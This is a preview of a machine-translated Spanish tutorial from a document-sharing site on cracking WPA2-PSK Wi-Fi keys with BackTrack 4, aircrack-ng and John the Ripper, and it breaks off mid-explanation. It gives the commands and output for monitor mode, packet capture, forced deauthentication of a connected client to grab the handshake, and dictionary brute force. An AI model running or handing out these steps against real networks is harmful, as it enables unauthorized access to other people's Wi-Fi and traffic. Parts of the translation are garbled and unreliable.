Formatos

Solo disponible en BuenasTareas
  • Páginas : 5 (1097 palabras )
  • Descarga(s) : 0
  • Publicado : 5 de marzo de 2012
Leer documento completo
Vista previa del texto
CRACKING WPA2-PSK CON BACKTRACK 4, AIRCRACK-NG Y JOHN EL DESTRIPADOR
● ● ● ● Poner la interfaz en modo monitor Buscar red inalámbrica (protegida con WPA2 y una clave previamente compartida) Capturar todos los paquetes Espere hasta que vea a un cliente y des-autenticación el cliente, por lo que el apretón de manos puede ser capturado Crackear la clave usando un archivo de diccionario (o por mediode John The Ripper) Voy a usar una interfaz de Dlink DWL-G122 (USB) de red inalámbrica para este procedimiento. En backtrack4, este dispositivo se reconoce como wlan0.



En primer lugar, poner la tarjeta en modo monitor:
root@bt:~# airmon-ng Interface wifi0 ath0 ath1 wlan0 Chipset Atheros Atheros Atheros Ralink 2573 USB Driver madwifi-ng madwifi-ng VAP (parent: wifi0) madwifi-ng VAP(parent: wifi0) rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0 Interface wifi0 ath0 ath1 wlan0 Chipset Atheros Atheros Atheros Ralink 2573 USB Driver madwifi-ng madwifi-ng VAP (parent: wifi0) madwifi-ng VAP (parent: wifi0) rt73usb - [phy0] (monitor mode enabled on mon0)

Ok ahora podemos utilizar la interfaz mon0 Vamos a encontrar una red inalámbrica que utiliza WPA2 / PSK:
root@bt:~#airodump-ng mon0 CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57 PWR -33 STATION 00:1C:BF:90:5B:A3 Beacons 5 #Data, #/s 0 PWR -29 0 CH 10 MB 54 Lost 12 ENC CIPHER AUTH ESSID PSK Probe TestNet TestNet

BSSID 00:19:5B:52:AD:F7 BSSID 00:19:5B:52:AD:F7

WPA2 CCMP Packets 4

Rate 0- 1

Dejar de airodump-ng y ejecutar de nuevo, escribiendo todos los paquetes en el disco:
airodump-ng mon0 --channel 10 --bssid00:19:5B:52:AD:F7 -w /tmp/wpa2

En este punto, usted tiene dos opciones: o bien esperar a que un cliente se conecta y el 4-Way Handshake se haya completado, o des-autenticación un cliente existente, por lo que la fuerza para volver a asociar. El tiempo es dinero, así que vamos a obligar a los des-autenticación. Necesitamos que el bssid de la AP (-a) y el Mac de un cliente conectado (-c)root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0 13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10 13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

Como consecuencia, airodump-ng deberá indicar "Apretón de manos WPA:" en la esquina superior derecha
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake:00:19:5B:52:AD:F7 BSSID 00:19:5B:52:AD:F7 BSSID 00:19:5B:52:AD:F7 PWR RXQ -33 100 STATION 00:1C:BF:90:5B:A3 Beacons 1338 PWR -27 #Data, #/s 99 Rate 54-54 0 CH 10 Lost 0 MB 54 ENC CIPHER AUTH ESSID PSK TestNet

WPA2 CCMP Packets 230 Probe

Dejar de airodump-ng y asegúrese de que los archivos fueron creados correctamente
root@bt:/# -rw-r--r--rw-r--r--rw-r--r-ls /tmp/wpa2* -al 1 root root 35189 2009-02-2113:04 /tmp/wpa2-01.cap 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

Forma de este momento, usted no necesita estar cerca de la red inalámbrica. Todas las grietas que sucederá en línea, para que pueda dejar airodump y otros procesos e incluso a pie de la AP. De hecho, me permito sugerir a pie y se encuentra un lugar acogedor donde sepuede vivir, comer, dormir, etc .... Romper una clave WPA2-PSK se basa en la fuerza bruta, y puede tomar un tiempo muy muy largo. Hay dos formas de fuerza bruta: una que es relativamente rápido, pero no garantiza el éxito y uno que es muy lento, pero garantiza que se encuentra la clave en algún momento en el tiempo La primera opción es el uso de un archivo de lista de trabajo / drstionary. Muchosde estos archivos se pueden encontrar en Internet (por ejemplo, o en www.theargon.com packetstorm (ver los archivos)), o pueden ser generados con herramientas como John The Ripper. Una vez que la lista de palabras se crea, todo lo que necesita hacer es ejecutar aircrack-ng con la lista de trabajo y alimentar la FIE. Tapa que contiene el protocolo de intercambio WPA2. Así que si su lista de...
tracking img